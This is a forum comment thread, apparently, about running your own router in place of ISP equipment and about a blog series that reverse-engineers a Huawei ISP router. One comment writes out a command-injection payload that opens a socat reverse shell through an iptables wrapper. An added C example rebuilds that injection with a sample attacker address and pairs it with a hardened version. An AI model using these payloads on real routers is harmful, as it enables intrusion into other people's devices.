I have a fiber connection, which I connected directly to a Ubiquiti router through a suitable SFP module. My ISP supplied the information on the fiber type and which VLAN IDs to set up for internet, TV and telephony.
This way I have my own equipment, that I control myself. The 'modem' [0] which my ISP supplied is still in its original, unopened box.
As a customer, I like it.
In other words, ISPs hate it because it forces them to actually do their jobs and be ISPs. The Internet itself is "a zoo of endpoints on a shared medium", and ISP stands for Internet Service Provider.
Which works out great for me. I can use OpenWRT with no hassle.
More to the point, I see the cable stuff as "ISP land" in that it's directly interfacing with their internal hardware, and so has to dance to their tune very directly, whereas Ethernet and TCP/IP are common, and so will obey my rules in my home. I don't expect my modem to perform adblocking, which is why my router does it, and I'm not going to be stupid and try to "uncap" my modem to get more speed, so I don't see a point to being able to provide my own cable modem. As long as I can own the router which provides the only path in and out of my LAN, I can do everything I'm capable of doing anyway, as far as I can see.
Other cable providers (e.g. Comcast) charge you a monthly fee (~$5-15) to rent their modem. Buying a modem gets cost effective pretty quickly.
I think this modem "uncapping" thing has mostly been an urban myth. Maybe there were some really early cable modem systems in the 90s where that would have been possible, but AFAIK with DOCSIS the speed is regulated by the CMTS [0], not the modems.
[0] https://en.wikipedia.org/wiki/Cable_modem_termination_system
Unfortunately I had no luck with that - my loose theory is that my EdgeRouter was doing a ping check to see if the IP was already taken before accepting the DHCP lease...
I was able to get "IP passthrough" mode working with the AT&T router though. The key hiccup was that the AT&T router had to be on a different subnet than my router's LAN subnet.
Also, if you didn't need so much bandwidth, is it possible to just order a basic 100 Mb/10 Mb connection for a nominal fee of, say, 30 Euro?
The speeds in the US aren't actually that bad, but you're basically forced to pay for everything: paid cable TV, equipment rental fees, etc, and your $40 plan ends up creeping towards $100 / month after the fees and taxes, with increases every year.
You can call your ISP with any arbitrary piece of non-branded random AliExpress $#@$ of a network eq. and they must walk you through configuring it? That does not make much sense to me.
I have never met someone who attempted to install their own cable modem. I do know that the cable modulation standard (DOCSIS) is wildly complicated, so even buying the right type of cable modem for your connection would be challenging. There may also be licensing issues involved that would prevent you from buying such modem completely.
So, I use an SFP module that is suitable for the wavelength and mode of my fiber connection, and plugged that into a Ubiquiti EdgeRouter. In the case of my ISP I had to configure a VLAN on the external interface, as they use separate VLANs for internet, TV and telephony. Once you configure the VLAN, the router will receive an IP address over DHCP and you'll be online.
In my case, I have VZ Fios in the northeast US. Their termination point at my house has an RJ45 Ethernet connection. It goes directly to my pfSense router.
You think it is going to blow people's socks off that a router provided and controlled by an ISP is accessible by that same ISP? Huh?
The Huawei SSH key is a little strange, but depressingly common for network equipment, even big names like Cisco[0].
[0] https://tools.cisco.com/security/center/content/CiscoSecurit...
There’s an understandable reason for this: the ISP’s staff aren’t necessarily any more competent than the ISP’s customers (some are, but there are so many ISPs that I suspect they are now a small minority). So just as the ISP wants to be able to reset your interface devices remotely, so will Huawei and Cisco support for the ISPs themselves.
I am not implying that “understandable” means “justified”
Even? By now Cisco having hardcoded credentials and glaring security fuckups is a meme.
You reckon? I don’t think they’d even be interested in hearing about it.
Where do you live and who is your local paper that leads you to believe they’d bother writing, let alone publishing, such a story?
For CenturyLink fiber I have two boxes:
Box A: the exterior fiber enters this box, the tech said it was a "translator"; and the port 4 ethernet on it goes to ...
Box B: the CenturyLink wireless router, which performs the PPPoE with my credentials, which were somehow hardwired because no one ever told me my username/password. I'm guessing TR-069? Then port 4 on this goes to ...
Box C: MY WRT1900AC, which then goes to other subnets for my cameras, lab, and office.
I figured Box B was redundant, but trying to remove it has been problematic.
For "Box B" you can use anything you wish as long as it supports PPPoE. Contact CenturyLink by phone or chat to tell them you need your PPP credentials, they'll have no trouble giving them to you. The only trick besides PPP is that CenturyLink usually uses a VLAN for customer equipment on their GPON, but that's pretty common with ethernet over ADSL as well so routers made for use with a DSL modem should have it in their UIs alongside the PPP info. Unfortunately most newer routers are made without this use case in mind so there may not be support, in which case you can always upgrade to something a little more configurable or use a computer as a router. You can ask the CSR for the VLAN ID but in every case I've seen it's 201.
I've done this a number of times and never had the CSR give me any trouble. They also don't seem to keep very good track of who has CL-owned CPE, I've ended up with "free" CenturyLink routers a couple of times because they fell through the cracks when switching to my own.
They make it very hard to use your own "Box B", but I've set this up twice now (most recently last week). Get the username and password from CenturyLink (the tech that installs the service has this, or call them). Then, google search "century link vlan 201 wan tag". The trick is you need a router that has this functionality, most basic consumer ones don't.
Unfortunately, even if you follow all directions and it still doesn't work troubleshooting is a nightmare, very little or no help from their customer support.
* router
* firewall
* NAT device
* modem
* switch
* access point
* DNS resolver
* DHCP server
And probably others I'm not thinking of :-)
This is not the case, certainly if you are referring to the router requirements. Last I looked, the rest of the IETF was also very cognizant of the distinction, as there has been wide anti-NAT sentiment in the IETF, trying to get people to move over to IPv6 etc.
Newer RFCs use different terms such as CPE (customer premises equipment) and AFTR (address family transition router)
Most folks have no idea how it works behind the scenes, which typically is a combination of NAT (IPv4), routing (IPv6), DHCP, DNS, UPnP, and more. So, it's just "the router".
My view: If it forwards IP between different networks, it's a router.
I'm pretty happy that my cable ISP is allowing this mode so I don't have to double-NAT in my setup.
My demarc has a hot ethernet jack, and my firewall (PC running Linux) that I control is connected to that ethernet jack. No ISP shenanigans (other than what they can remotely do to configure the FiOS demarc itself).
For those who also have TV service, it’s more complicated, since the STBs talk TCP/IP over MoCA for various services (I believe including the program guide and DVR functions). The Ubiquiti forums have lots of posts on people trying (and succeeding) to get their gear working with FiOS.
I think pfSense will be my next too.
"This is very invasive and unacceptable. It may seem necessary to apply security patches published by your ISP but the user should be able to disable it whenever she wants."
Legally, at least in countries where I've lived, the ISP still owns the router. This surprised me a bit when I first found out, but then I got used to the idea, but you should treat any ISP or telecom gear in your house as something that's "rented but still owned and controlled by someone else".
For example

    iptables %s > %s 2>&1

could probably be executed as

    iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > /var/IptablesInfo 2>&1

by issuing

    iptables -L; socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane

and therefore it might be possible to get real shell access too.

    undefined4 FUN_004045a0(int param_1,int param_2)
    {
      int iVar1;
      int iVar2;
      char *pcVar3;
      char cVar4;
      code *pcVar5;
      undefined auStack544 [256];
      undefined auStack288 [260];

      FUN_00412530(auStack544,0,0x100);        /* probably memset */
      FUN_00412530(auStack288,0,0x100);
      if (param_1 == 0) {
        FUN_004122c0(auStack288,0x100,"iptables > %s 2>&1","/var/IptablesInfo");  /* probably snprintf */
      }
      else {
        iVar1 = FUN_00412210(0x100);           /* probably malloc */
        if (iVar1 == 0) {
          return 0x40010009;
        }
        cVar4 = '\0';
        /* joins up to 0x10 strings from param_2 with spaces; 0x412c84 is likely "%s" */
        while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
          if (cVar4 == '\0') {
            FUN_004122c0(iVar1,0x100,0x412c84,iVar2);
          }
          else {
            FUN_004122c0(iVar1,0x100,"%s %s",iVar1,iVar2);
          }
          cVar4 = cVar4 + '\x01';
          param_2 = param_2 + 1;
        }
        FUN_004122c0(auStack288,0x100,"iptables %s > %s 2>&1",iVar1,"/var/IptablesInfo");
        FUN_00412660(iVar1);                   /* probably free */
      }
      FUN_00412330(auStack288);                /* the built command line, probably handed to system() */
      iVar1 = FUN_004123c0("/var/IptablesInfo",0x414f68);  /* probably fopen */
      if (iVar1 == 0) {
        pcVar5 = FUN_004126e0;
        pcVar3 = "Fail\r";
      }
      else {
        while (iVar2 = FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {  /* probably fgets */
          FUN_004126b0(0x412c84,auStack544);
          FUN_004121a0(0xd);
        }
        FUN_00412520(DAT_0042b010);
        FUN_004123a0(iVar1);                   /* probably fclose */
        pcVar5 = FUN_00412500;
        pcVar3 = "/var/IptablesInfo";
      }
      (*pcVar5)(pcVar3);
      return 0;
    }

Any ideas?
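As an added example (not code from the blog post, the commenter, or the router firmware), the injection path described in the comment above reconstructed in C, next to a hardened variant. The 0x100-byte buffers and the 16-argument limit come from the decompiled listing; the argument allow-list, the fork/exec wrapper and the sample payload (203.0.113.5:4444 standing in for $RHOST:$RPORT) are my own assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define CMD_MAX  256   /* the decompiled function uses 0x100-byte buffers */
#define MAX_ARGS 16    /* its loop stops after 0x10 arguments */

/* Mirrors what the decompiled loop appears to do: join up to MAX_ARGS
 * argument strings with single spaces.  (The original passes the
 * destination buffer as a "%s" source, which is undefined behaviour;
 * an offset is tracked here instead.)  Returns joined length or -1. */
int join_args(const char *const *args, char *out, size_t outsz)
{
    size_t len = 0;
    out[0] = '\0';
    for (int i = 0; i < MAX_ARGS && args[i] != NULL; i++) {
        int n = snprintf(out + len, outsz - len, "%s%s", i ? " " : "", args[i]);
        if (n < 0 || (size_t)n >= outsz - len)
            return -1;
        len += (size_t)n;
    }
    return (int)len;
}

/* The vulnerable pattern: the joined, attacker-influenced string is pasted
 * into a shell command line that is then handed to system(). */
int build_iptables_cmd(const char *const *args, char *out, size_t outsz)
{
    char joined[CMD_MAX];
    if (join_args(args, joined, sizeof joined) < 0)
        return -1;
    int n = snprintf(out, outsz, "iptables %s > %s 2>&1", joined, "/var/IptablesInfo");
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    return n;
}

/* Does a string carry characters the shell treats as separators,
 * redirections or substitutions?  Detection aid only, not a sanitiser. */
int has_shell_metachar(const char *s)
{
    return strpbrk(s, ";|&`$<>()\n") != NULL;
}

/* Hardened approach, part 1 (assumed allow-list): iptables options and
 * values need letters, digits and a little punctuation; anything else is
 * refused rather than escaped. */
int iptables_arg_ok(const char *a)
{
    if (a[0] == '\0' || strlen(a) >= 64)
        return 0;
    for (const unsigned char *p = (const unsigned char *)a; *p; p++)
        if (!isalnum(*p) && strchr("-_.:/,", *p) == NULL)
            return 0;
    return 1;
}

int all_args_ok(const char *const *args)
{
    int i = 0;
    for (; args[i] != NULL; i++)
        if (i >= MAX_ARGS || !iptables_arg_ok(args[i]))
            return 0;
    return i > 0;
}

/* Hardened approach, part 2: never go through /bin/sh.  fork/exec iptables
 * with a fixed argv and redirect output with dup2, so no string is ever
 * parsed by a shell.  Returns the child's exit status, or -1. */
int run_iptables_noshell(const char *const *args, const char *outpath)
{
    if (!all_args_ok(args))
        return -1;
    const char *argv[MAX_ARGS + 2];
    int n = 0;
    argv[n++] = "iptables";
    for (int i = 0; args[i] != NULL; i++)
        argv[n++] = args[i];
    argv[n] = NULL;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (freopen(outpath, "w", stdout) == NULL)
            _exit(127);
        dup2(STDOUT_FILENO, STDERR_FILENO);
        execvp("iptables", (char *const *)argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: the payload shape from the comment above. */
    const char *injected[] = { "-L;", "socat", "tcp-connect:203.0.113.5:4444",
                               "exec:sh,pty,stderr,setsid,sigint,sane", NULL };
    char cmd[CMD_MAX];
    if (build_iptables_cmd(injected, cmd, sizeof cmd) > 0)
        printf("system() would receive: %s\n", cmd);
    printf("allow-list accepts these arguments: %d\n", all_args_ok(injected));
    return 0;
}
```

The point of the two halves: escaping the joined string is fragile because the shell's quoting rules are the attacker's playground, whereas an allow-list plus execvp removes the shell from the path entirely, so a `;` in an argument is just a byte that iptables will reject.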
I am still confused by this code, but to me it looks like this was originally written in another language; maybe this is just what it looks like after decompiling. Seeing this function would likely be more interesting.
I'd bet for (1), but who knows.
I don't really trust ISP provided hardware / software now though.
Obviously I don't know specifics, but if this applies to any router which has multiple tiers of login then it could be a pretty serious problem. I suspect that might be true for routers designed specifically to broadcast multiple networks (e.g. school or shared apartment-building routers)?
[0] https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F...
Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-Already...
And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already...
Summary from the end of Part 3:
"So we managed to change passwords for both ssh and telnet, gain access to Root user for the web interface, changed that password too. We changed ACS URL to ours and remove the IP restrictions. To put it simply, we cleaned up our router from our ISP. Good for our privacy."
"Still there is an authorized ssh key left in the firmware but for now it’s enough that we’re keeping the ISP out. Maybe in the future, we can repack the firmware with our configuration and keys and install it on the router. For now, take care!"
Some customers apparently have absolutely no access to their routers, not even to the web interface, and they can't use their own either. All reconfiguration must be done through the customer service portal or by phone. That means the carrier can charge for every little thing, including changing the Wi-Fi config! I'm not sure if you can even bridge, but I guess not. Note that this does not affect all customers of that carrier, just a minority.
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
631/tcp open ipp
5000/tcp open upnp
7777/tcp open cbt
20005/tcp open btx
Now begins the three-hours-and-counting rabbit hole of trying to figure out what the hell is running on ports 7777 and 20005. Or why UPnP is apparently running, despite UPnP being explicitly disabled on the Netgear router's admin page.

For a while I had my own OpenWRT router in place of the ISP one, but I think they got wise to it and blocked the MAC. I changed it to match the ISP router's MAC address, but it only worked for about 3 minutes before being blocked again.
The 20005 one may be some port that NetGear uses for its USB Printing, I've found some articles that mention it.
It also struck me that I hit it with nmap using the LAN IP, so perhaps these are only open within the network. I probably need to hit the external IP of the router to see what is externally open. ShieldsUP! didn't show anything unusual.[1]
EDIT: Disclosure of a vulnerability regarding port 20005[2], and Netgear confirming that it does affect my router[3], but should have been fixed. I assume the "fix" was fixing the buffer overflow vulnerability, rather than closing the port altogether.
[1] https://www.grc.com/x/ne.dll?bh0bkyd2
[2] https://www.kb.cert.org/vuls/id/177092/
[3] https://kb.netgear.com/28393/NETGEAR-Product-Vulnerability-A...
What about that precompiled .ssh/authorized_keys with user z00163152@HUAWEI-627FB9A3 mentioned in Part 3?
Any reason why a router firmware would permit root access to anyone at all? Definitely sounds like a backdoor to me.
How about this?: "You can use your own device and we provide all required information, but there will be no advanced support and you have to check for bugfixes yourself monthly."
... now that I wrote it, I see the answer: There is no way to enforce this, especially not reliably.
> Mirai then identifies vulnerable IoT devices using a table of more than 60 common factory default usernames and passwords
Taking control of the device is exactly the kind of thing that stops that attack.
[1] https://unix.stackexchange.com/questions/510947/how-can-i-ru...
Who knows indeed?!
I had thought it had something to with the ISP allocating the same static IP to multiple clients and blocking some common ports to prevent collisions (ended up using port 109.. something for SSH). Turns out it was more interesting!
In part 3 https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-Already... the author writes that a Huawei engineer has an authorized ssh key that would allow them to access your router.
Just Wow!
Fortunately some kind person leaked the admin password so that I could configure it to my liking.
Every other router, for 20 years now, had a slow and buggy web interface.
Why is this?!